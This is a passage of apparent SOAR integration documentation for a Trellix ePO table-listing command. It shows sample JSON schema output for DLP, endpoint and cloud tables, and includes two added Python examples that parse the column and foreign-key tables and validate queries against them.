        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n -------------------------------------- -------------- ----------------- ------------------- --------------- ----------- ------------\r\n MDCC_CLOUD_VOL_PROPS_VW_awsVolumeSquid VOLUME_AUTO_ID MDCC_VOLUME AUTO_ID False True False \r\n"
    },
    {
        "name": "Events received from managed systems",
        "target": "EPOEventFilterDesc",
        "type": "join",
        "databaseType": "",
        "description": "Retrieves information about Threat Events sent from managed systems.",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n -------- ------------------------- ------- ---------- -------- ------ -------\r\n EventId eventIdInt False False False True True \r\n Name string_lookupWithResolver True True True True False \r\n Language string False False False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Label ",
        "target": "UDLP_OperationalLabelInfoView_Archive",
        "type": "join",
        "databaseType": "",
        "description": "Label ",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n --------- -------------- ------- ---------- -------- ------ -------\r\n EventId long True False False True True \r\n LabelName udlp_oneToMany False True False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Task Log Entries",
        "target": "OrionTaskLogTask",
        "type": "target",
        "databaseType": "",
        "description": "Allows you to query upon log entries created by a top-level task.",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ---------- ------------- ------- ---------- -------- ------ -------\r\n Id long False False False True True \r\n Name string_lookup True True True True False \r\n StartDate timestamp True True True True False \r\n EndDate timestamp True True True True False \r\n UserName string_lookup True True True True False \r\n Status enum True True True True False \r\n TaskSource string_enum True True True True False \r\n Duration long True False False True False \r\n TenantId int False False False True True \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    }
]
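In the List Table output above, `columns`, `relatedTables` and `foreignKeys` are plain-text tables packed into strings, so a playbook has to parse them before it can use the schema. The following Python sketch is an added illustration, not code from D3 or Trellix: it parses two entries from the sample (columns trimmed) and checks a planned query against the per-column flags. The function names are hypothetical. It assumes that `Select?` and `Condition?` mark the columns usable in a select list and in a filter, and that names and types contain no spaces.

```python
import json

# Constructed sample: two entries from the List Table sample above, columns trimmed.
LIST_TABLE_JSON = r'''[
  {"name": "Task Log Entries", "target": "OrionTaskLogTask", "type": "target",
   "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ---------- ------------- ------- ---------- -------- ------ -------\r\n Id long False False False True True \r\n Name string_lookup True True True True False \r\n Status enum True True True True False \r\n Duration long True False False True False \r\n",
   "relatedTables": "\r\n Name\r\n ----\r\n",
   "foreignKeys": "None"},
  {"name": "vpcflowLog.table.name", "target": "vpcflowLog", "type": "target",
   "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ----------------------- ------ ------- ---------- -------- ------ -------\r\n AUTO_ID int True True False True True \r\n EPO_LEAF_NODE_ID int True True False True True \r\n",
   "relatedTables": "\r\n Name\r\n --------------\r\n gridthreatlist\r\n ePOLeafNode\r\n",
   "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n ------------ -------------- ----------------- ------------------- --------------- ----------- ------------\r\n vpcflowLog EPO_LEAF_NODE_ID ePOLeafNode AutoID False False True \r\n vpcflowLog AUTO_ID gridthreatlist VPC_FLOWLOG_ID False False True \r\n"}
]'''

FLAGS = ("select", "condition", "group_by", "order", "number")


def _rows(text):
    """Return whitespace-split data rows found below the dashed separator line.

    Handles the three shapes in the sample: a full table, a header with no
    rows, and the literal string "None" (no separator, so no rows).
    """
    lines = [ln.strip() for ln in (text or "").splitlines() if ln.strip()]
    for i, ln in enumerate(lines):
        if set(ln) <= {"-", " "}:
            return [row.split() for row in lines[i + 1:]]
    return []


def parse_columns(text):
    """Map column name -> type plus the five boolean capability flags."""
    columns = {}
    for row in _rows(text):
        if len(row) != 2 + len(FLAGS):
            raise ValueError(f"unexpected column row: {row!r}")
        name, col_type, *flags = row
        columns[name] = {"type": col_type,
                         **{f: v == "True" for f, v in zip(FLAGS, flags)}}
    return columns


def parse_foreign_keys(text):
    """Parse the foreignKeys table; multi-column keys are comma-separated."""
    keys = []
    for row in _rows(text):
        if len(row) != 7:
            raise ValueError(f"unexpected foreign key row: {row!r}")
        src, src_cols, dst, dst_cols, inverse, one, many = row
        keys.append({
            "source_table": src, "source_columns": src_cols.split(","),
            "dest_table": dst, "dest_columns": dst_cols.split(","),
            "allows_inverse": inverse == "True",
            "one_to_one": one == "True", "many_to_one": many == "True",
        })
    return keys


def load_schema(raw_json):
    """Build {target: {...}} from the List Table Raw Data JSON text."""
    schema = {}
    for table in json.loads(raw_json):
        schema[table["target"]] = {
            "name": table["name"],
            "columns": parse_columns(table["columns"]),
            "related": [row[0] for row in _rows(table["relatedTables"])],
            "foreign_keys": parse_foreign_keys(table["foreignKeys"]),
        }
    return schema


def check_query(schema, target, select=(), where=()):
    """List the problems with a planned query; an empty list means none found."""
    table = schema.get(target)
    if table is None:
        return [f"unknown table: {target}"]
    problems = []
    for flag, names in (("select", select), ("condition", where)):
        for name in names:
            column = table["columns"].get(name)
            if column is None:
                problems.append(f"{target}.{name}: no such column")
            elif not column[flag]:
                problems.append(f"{target}.{name}: not usable for {flag}")
    return problems


if __name__ == "__main__":
    s = load_schema(LIST_TABLE_JSON)
    print(check_query(s, "OrionTaskLogTask", select=["Id"], where=["Duration"]))
```
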
Context Data

The data extracted from Raw Data and converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "name": "workloaddetailVcenter.table.name",
        "target": "workloaddetailVcenter",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------- ------ ------- ---------- -------- ------ -------\r\n id int True True False True True \r\n ePOLeafNodeId int True True False True True \r\n status string True True False True False \r\n",
        "relatedTables": "\r\n Name\r\n -------------\r\n sasvmsetting\r\n vminfovcenter\r\n ePOLeafNode\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n --------------------- -------------- ----------------- ------------------- --------------- ----------- ------------\r\n workloaddetailVcenter ePOLeafNodeId ePOLeafNode AutoID False False True \r\n workloaddetailVcenter ePOLeafNodeId vminfovcenter EPO_LEAF_NODE_ID False False True \r\n workloaddetailVcenter id sasvmsetting sarVMStatusId False False True \r\n"
    },
    {
        "name": "Network discovery scan error",
        "target": "UDLP_Operational_NetworkDiscoveryFailure_Archive",
        "type": "join",
        "databaseType": "",
        "description": "Network discovery scan error details",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------- -------------------- ------- ---------- -------- ------ -------\r\n EventID long False False False True True \r\n ScanUsername udlp_searchable_text True True True True False \r\n Reason enum True True True True False \r\n ReasonDetails string True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "DLP Data at Rest (Endpoint) Incidents History",
        "target": "UDLP_EPD_Incidents_Archive",
        "type": "join",
        "databaseType": "",
        "description": "All incidents related to data at rest (Endpoint)",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------------------ -------------------------------- ------- ---------- -------- ------ -------\r\n IncidentId long True True True True True \r\n OriginalIncidentId long True True True True True \r\n IncidentType enum True True True True False \r\n ViolationLocalTime udlp_abstimestamp_endpoint_col True True True True False \r\n ViolationTimezone string_lookup True True True True False \r\n ViolationUTCTime udlp_abstimestamp_col True True True True False \r\n ViolationCustomTime udlp_abstimestamp_withoffset_col True True True True False \r\n ComputerID int False False False True True \r\n UserID int False False False True True \r\n Severity enum True True True True False \r\n StatusId udlp_common_status_col True True True True False \r\n ResolutionId udlp_common_resolution_col True True True True False \r\n Reviewer udlp_reviewer_col True True True True False \r\n McAfeeAgentGuid udlp_searchable_text True True True True False \r\n DlpAgentVersion string_lookup True True True True False \r\n EvidenceCount int True True True True True \r\n TotalMatchCount int True True True True True \r\n TotalContentSize udlp_kilo_col True True True True True \r\n PolicyInfoId int False False False True True \r\n ClassificationsToDisplay string True False False True False \r\n RulesToDisplay string True False True True False \r\n RuleSetToDisplay string True False True True False \r\n ConnectivityState enum True True True True False \r\n ActualAction enum True True True True False \r\n ExpectedAction enum True True True True False \r\n FailureReason enum True True True True False \r\n LastUpdateTimestamp udlp_abstimestamp_col True True True True False \r\n ReportingProduct enum True True True True False \r\n ShortMatchString udlp_contains_words_col True False False True False \r\n",
        "relatedTables": "\r\n Name\r\n -----------------------------------------\r\n UDLP_EPD_IncidentDiscoverySummary_Archive\r\n UDLP_EventComputers\r\n UDLP_EventUsers\r\n UDLP_EPD_IncidentLabelsView_Archive\r\n UDLP_EPD_IncidentRules_Archive\r\n UDLP_EPD_IncidentEvidences_Archive\r\n UDLP_IncidentResolutions\r\n UDLP_EPD_IncidentExport\r\n UDLP_IncidentStatuses\r\n UDLP_EventPolicyInfo\r\n UDLP_EPD_IncidentClassification_Archive\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n -------------------------- -------------- ----------------------- ------------------- --------------- ----------- ------------\r\n UDLP_EPD_Incidents_Archive ComputerID UDLP_EventComputers ID False False True \r\n UDLP_EPD_Incidents_Archive UserID UDLP_EventUsers UserId False False True \r\n UDLP_EPD_Incidents_Archive StatusId UDLP_IncidentStatuses StatusID False False True \r\n UDLP_EPD_Incidents_Archive ResolutionId UDLP_IncidentResolutions ResolutionID False False True \r\n UDLP_EPD_Incidents_Archive PolicyInfoId UDLP_EventPolicyInfo PolicyInfoId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentRules_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentLabelsView_Archive LabelIncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentDiscoverySummary_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentEvidences_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentClassification_Archive IncidentId False False True \r\n UDLP_EPD_Incidents_Archive IncidentId UDLP_EPD_IncidentExport IncidentId False False True \r\n"
    },
    {
        "name": "groupinfo.table.name",
        "target": "groupinfo",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ---------- ------ ------- ---------- -------- ------ -------\r\n GROUP_NAME string True False False True False \r\n AUTO_ID int True True False True True \r\n PARENT_ID int False True False True True \r\n ACCOUNT_ID int False True False True True \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "epoproductproperties.table.name",
        "target": "epoproductproperties",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n -------------- ------ ------- ---------- -------- ------ -------\r\n ParentID int True True False True True \r\n ProductCode string True True False True False \r\n ProductVersion string True True False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "McAfee Active Response Server Properties",
        "target": "EPOProdPropsView_MARSERVER",
        "type": "join",
        "databaseType": "",
        "description": "McAfee Active Response Server Properties",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------------- -------------- ------- ---------- -------- ------ -------\r\n LeafNodeID int False False False True True \r\n ProductPropertiesID int False False False True True \r\n ProductFamily string False False False True False \r\n FamilyDispName string False False False True False \r\n ProductCode string False False False True False \r\n productversion productVersion True True True True False \r\n language string_enum True True True True False \r\n hotfix string True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n -----------\r\n EPOLeafNode\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n -------------------------- -------------- ----------------- ------------------- --------------- ----------- ------------\r\n EPOProdPropsView_MARSERVER LeafNodeID EPOLeafNode AutoID False True False \r\n"
    },
    {
        "name": "Resolutions",
        "target": "UDLP_IncidentResolutions",
        "type": "join",
        "databaseType": "",
        "description": "Resolutions",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------- ------------------ ------- ---------- -------- ------ -------\r\n ResolutionID long False False False True True \r\n ResolutionKey udlp_fk_lookup_col True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "DLP Discovery Scans",
        "target": "UDLP_DiscoveryScansRegDocView",
        "type": "join",
        "databaseType": "",
        "description": "Status of Discovery scans",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ----------------- --------------------- ------- ---------- -------- ------ -------\r\n ScanId string False False False True False \r\n Name string_lookup True True True True False \r\n ServerName string_lookup False True False True False \r\n ServerMachineName string_lookup False True False True False \r\n StartTime udlp_abstimestamp_col True True True True False \r\n EndTime udlp_abstimestamp_col True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Mobile Device Information",
        "target": "UDLP_IncidentMobileDevice_Archive",
        "type": "join",
        "databaseType": "",
        "description": "Mobile Device Information",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n --------------- -------------------- ------- ---------- -------- ------ -------\r\n IncidentId long False False False True True \r\n MobileDeviceID udlp_searchable_text True True True True False \r\n MobileOs enum True True True True False \r\n MobileUserAgent udlp_searchable_text True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Manual Registration Documents Classification",
        "target": "UDLP_RegisterDocumentsClassification",
        "type": "join",
        "databaseType": "",
        "description": "Manual Registration Documents Classification",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ------------------ ------------- ------- ---------- -------- ------ -------\r\n RegDocID int False False False True True \r\n ClassificationID string False False False True False \r\n ClassificationName string_lookup False True False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "McAfee Threat Intelligence Exchange Server Roll-up Properties",
        "target": "EPORollup_ProductPropertiesTIE",
        "type": "join",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n -------------- ------------------ ------- ---------- -------- ------ -------\r\n ServerId non_arithmetic_int False False False True False \r\n ParentId non_arithmetic_int False False False True False \r\n ExternalId non_arithmetic_int False False False True False \r\n productversion productVersion True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n -------------------\r\n EpoRollup_Computers\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n ------------------------------ ----------------- ------------------- ------------------- --------------- ----------- ------------\r\n EPORollup_ProductPropertiesTIE ServerId,ParentId EpoRollup_Computers ServerId,ExternalId False True False \r\n"
    },
    {
        "name": "vpcflowLog.table.name",
        "target": "vpcflowLog",
        "type": "target",
        "databaseType": "",
        "description": null,
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ----------------------- ------ ------- ---------- -------- ------ -------\r\n AUTO_ID int True True False True True \r\n LATEST_TRAFFIC_END_TIME string True True False True False \r\n EPO_LEAF_NODE_ID int True True False True True \r\n ANALYSIS int True True False True True \r\n FROMTO_ADDRESS string True True False True False \r\n FROMTO_PORT int True True False True True \r\n NUMBER_OF_OCCURANCES int True True False True True \r\n TRAFFIC_TYPE int True True False True True \r\n TRAFFIC_ACTION int True True False True True \r\n IS_NEW int True True False True True \r\n",
        "relatedTables": "\r\n Name\r\n --------------\r\n gridthreatlist\r\n ePOLeafNode\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n ------------ -------------- ----------------- ------------------- --------------- ----------- ------------\r\n vpcflowLog EPO_LEAF_NODE_ID ePOLeafNode AutoID False False True \r\n vpcflowLog AUTO_ID gridthreatlist VPC_FLOWLOG_ID False False True \r\n"
    },
    {
        "name": "AWS Volume Properties",
        "target": "MDCC_CLOUD_VOL_PROPS_VW_awsVolumeSquid",
        "type": "target",
        "databaseType": "",
        "description": "Volume properties specific to Volume from Amazon Web Service ",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ----------------- ------ ------- ---------- -------- ------ -------\r\n VOLUME_AUTO_ID int False False False True True \r\n instance_device string True True True True False \r\n reserved_for_root string True True True True False \r\n snapshot_id string True True True True False \r\n tags string True True True True False \r\n volume_size string True True True True False \r\n volume_state string True True True True False \r\n create_time string True True True True False \r\n volume_type string True True True True False \r\n encryption_status string True True True True False \r\n alias_key_name string True True True True False \r\n",
        "relatedTables": "\r\n Name\r\n -----------\r\n MDCC_VOLUME\r\n",
        "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n -------------------------------------- -------------- ----------------- ------------------- --------------- ----------- ------------\r\n MDCC_CLOUD_VOL_PROPS_VW_awsVolumeSquid VOLUME_AUTO_ID MDCC_VOLUME AUTO_ID False True False \r\n"
    },
    {
        "name": "Events received from managed systems",
        "target": "EPOEventFilterDesc",
        "type": "join",
        "databaseType": "",
        "description": "Retrieves information about Threat Events sent from managed systems.",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n -------- ------------------------- ------- ---------- -------- ------ -------\r\n EventId eventIdInt False False False True True \r\n Name string_lookupWithResolver True True True True False \r\n Language string False False False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Label ",
        "target": "UDLP_OperationalLabelInfoView_Archive",
        "type": "join",
        "databaseType": "",
        "description": "Label ",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n --------- -------------- ------- ---------- -------- ------ -------\r\n EventId long True False False True True \r\n LabelName udlp_oneToMany False True False True False \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    },
    {
        "name": "Task Log Entries",
        "target": "OrionTaskLogTask",
        "type": "target",
        "databaseType": "",
        "description": "Allows you to query upon log entries created by a top-level task.",
        "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n ---------- ------------- ------- ---------- -------- ------ -------\r\n Id long False False False True True \r\n Name string_lookup True True True True False \r\n StartDate timestamp True True True True False \r\n EndDate timestamp True True True True False \r\n UserName string_lookup True True True True False \r\n Status enum True True True True False \r\n TaskSource string_enum True True True True False \r\n Duration long True False False True False \r\n TenantId int False False False True True \r\n",
        "relatedTables": "\r\n Name\r\n ----\r\n",
        "foreignKeys": "None"
    }
]
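
The `columns` and `foreignKeys` values in the raw data above are whitespace-delimited text tables embedded in JSON strings, so they must be parsed before a playbook can check a query against them. The following Python code is an added example, not part of D3 SOAR or the Trellix API: it parses both tables and flags query columns that the schema does not allow. The function names are hypothetical, the sample is constructed from two entries shown above, and reading `Select?` and `Condition?` as "may be selected" and "may be used in a filter" is an assumption.

```python
import json

# Constructed sample: two entries abridged from the raw data shown above.
SAMPLE_RAW = r'''
[
  {"name": "Events received from managed systems",
   "target": "EPOEventFilterDesc",
   "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n -------- ------------------------- ------- ---------- -------- ------ -------\r\n EventId eventIdInt False False False True True \r\n Name string_lookupWithResolver True True True True False \r\n Language string False False False True False \r\n",
   "foreignKeys": "None"},
  {"name": "McAfee Threat Intelligence Exchange Server Roll-up Properties",
   "target": "EPORollup_ProductPropertiesTIE",
   "columns": "\r\n Name Type Select? Condition? GroupBy? Order? Number? \r\n -------------- ------------------ ------- ---------- -------- ------ -------\r\n ServerId non_arithmetic_int False False False True False \r\n productversion productVersion True True True True False \r\n",
   "foreignKeys": "\r\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \r\n ------------------------------ ----------------- ------------------- ------------------- --------------- ----------- ------------\r\n EPORollup_ProductPropertiesTIE ServerId,ParentId EpoRollup_Computers ServerId,ExternalId False True False \r\n"}
]
'''

COLUMN_FLAGS = ("select", "condition", "group_by", "order", "number")
FK_FIELDS = ("source_table", "source_columns", "dest_table", "dest_columns",
             "allows_inverse", "one_to_one", "many_to_one")


def _data_rows(text):
    """Yield the whitespace-split rows that follow the dashed separator line."""
    if not text or text.strip() == "None":
        return
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    for i, ln in enumerate(lines):
        if set(ln) <= {"-", " "}:          # the "---- ----" line under the header
            for row in lines[i + 1:]:
                yield row.split()
            return


def parse_columns(text):
    """Map column name -> type and boolean capability flags."""
    cols = {}
    for row in _data_rows(text):
        if len(row) != 7:
            raise ValueError(f"unexpected column row: {row!r}")
        name, col_type, *flags = row
        cols[name] = {"type": col_type,
                      **{k: v == "True" for k, v in zip(COLUMN_FLAGS, flags)}}
    return cols


def parse_foreign_keys(text):
    """Return one dict per foreign-key row; "None" or an empty table gives []."""
    fks = []
    for row in _data_rows(text):
        if len(row) != 7:
            raise ValueError(f"unexpected foreign-key row: {row!r}")
        fk = dict(zip(FK_FIELDS, row))
        for key in ("source_columns", "dest_columns"):
            fk[key] = fk[key].split(",")
        for key in ("allows_inverse", "one_to_one", "many_to_one"):
            fk[key] = fk[key] == "True"
        fks.append(fk)
    return fks


def load_schema(raw_json):
    """Index the table list by its `target` value."""
    return {t["target"]: {"name": t["name"],
                          "columns": parse_columns(t.get("columns")),
                          "foreign_keys": parse_foreign_keys(t.get("foreignKeys"))}
            for t in json.loads(raw_json)}


def check_query(schema, target, select=(), where=()):
    """List the reasons a query would not match the schema (empty list = OK)."""
    table = schema.get(target)
    if table is None:
        return [f"unknown table: {target}"]
    problems = []
    for usage, flag, names in (("selected", "select", select),
                               ("used in a condition", "condition", where)):
        for name in names:
            col = table["columns"].get(name)
            if col is None:
                problems.append(f"{target}.{name}: unknown column")
            elif not col[flag]:
                problems.append(f"{target}.{name}: cannot be {usage}")
    return problems


if __name__ == "__main__":
    schema = load_schema(SAMPLE_RAW)
    for problem in check_query(schema, "EPOEventFilterDesc",
                               select=["Name", "EventId"], where=["Language"]):
        print(problem)
```
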
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

{
    "Output": "\"[[\\r\\n    {\\r\\n        \\\"name\\\": \\\"workloaddetailVcenter.table.name\\\",\\r\\n        \\\"target\\\": \\\"workloaddetailVcenter\\\",\\r\\n        \\\"type\\\": \\\"target\\\",\\r\\n        \\\"databaseType\\\": \\\"\\\",\\r\\n        \\\"description\\\": null,\\r\\n        \\\"columns\\\": \\\"\\\\r\\\\n Name Type Select? Condition? GroupBy? Order? Number? \\\\r\\\\n ------------- ------ ------- ---------- -------- ------ -------\\\\r\\\\n id int True True False True True \\\\r\\\\n ePOLeafNodeId int True True False True True \\\\r\\\\n status string True True False True False \\\\r\\\\n\\\",\\r\\n        \\\"relatedTables\\\": \\\"\\\\r\\\\n Name\\\\r\\\\n -------------\\\\r\\\\n sasvmsetting\\\\r\\\\n vminfovcenter\\\\r\\\\n ePOLeafNode\\\\r\\\\n\\\",\\r\\n        \\\"foreignKeys\\\": \\\"\\\\r\\\\n Source table Source Columns Destination table Destination columns Allows inverse? One-to-one? Many-to-one? \\\\r\\\\n --------------------- -------------- ----------------- ------------------- --------------- ----------- ------------\\\\r\\\\n workloaddetailVcenter ePOLeafNodeId ePOLeafNode AutoID False False True \\\\r\\\\n workloaddetailVcenter ePOLeafNodeId vminfovcenter EPO_LEAF_NODE_ID False False True \\\\r\\\\n workloaddetailVcenter id sasvmsetting sarVMStatusId False False True \\\\r\\\\n\\\"\\r\\n    }]\"",
    "name": "\"[\\r\\n\\t\\t\\t\\\"workloaddetailVcenter.table.name\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Endpoint) Incidents History\\\",\\r\\n\\t\\t\\t\\\"groupinfo.table.name\\\",\\r\\n\\t\\t\\t\\\"epoproductproperties.table.name\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Server Properties\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"DLP Discovery Scans\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"Manual Registration Documents Classification\\\",\\r\\n\\t\\t\\t\\\"McAfee Threat Intelligence Exchange Server Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"vpcflowLog.table.name\\\",\\r\\n\\t\\t\\t\\\"AWS Volume Properties\\\",\\r\\n\\t\\t\\t\\\"Events received from managed systems\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Task Log Entries\\\",\\r\\n\\t\\t\\t\\\"Discovery Scan Info\\\",\\r\\n\\t\\t\\t\\\"DLP Data In-use/motion Incidents History\\\",\\r\\n\\t\\t\\t\\\"Rolled-Up Applied Policies\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path \\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information \\\",\\r\\n\\t\\t\\t\\\"Installations\\\",\\r\\n\\t\\t\\t\\\"Tag Usage\\\",\\r\\n\\t\\t\\t\\\"mgi1.table.name\\\",\\r\\n\\t\\t\\t\\\"Groups\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"DXL Client Status\\\",\\r\\n\\t\\t\\t\\\"Active Response System\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path \\\",\\r\\n\\t\\t\\t\\\"epoTagAssignment.table.name\\\",\\r\\n\\t\\t\\t\\\"Computer Properties\\\",\\r\\n\\t\\t\\t\\\"sasvmsetting.table.name\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Product Improvement Program Roll-up 
Properties\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"DXLProdPropsView_DXLCLIENT.table.name\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Amazon Network Traffic Logs\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Servers\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Installed Versions Summary\\\",\\r\\n\\t\\t\\t\\\"DLP Data at Rest (Network) Incidents\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"Automatic Registration Documents\\\",\\r\\n\\t\\t\\t\\\"kubelabelinfo.table.name\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Broker Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection Systems\\\",\\r\\n\\t\\t\\t\\\"Amazon Web Service System Properties\\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"vminfo.table.name\\\",\\r\\n\\t\\t\\t\\\"Azure Discovery Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Tag Restrictions\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error\\\",\\r\\n\\t\\t\\t\\\"McAfee DXL Java Client Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"ePOLeafNode.table.name\\\",\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Events\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"DLP Endpoint Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR Properties\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Network\\\",\\r\\n\\t\\t\\t\\\"DLP User Session Rules\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Instances\\\",\\r\\n\\t\\t\\t\\\"Product Coverage Reports Roll-up Properties\\\",\\r\\n\\t\\t\\t\\\"Applied Policies\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"Generated 
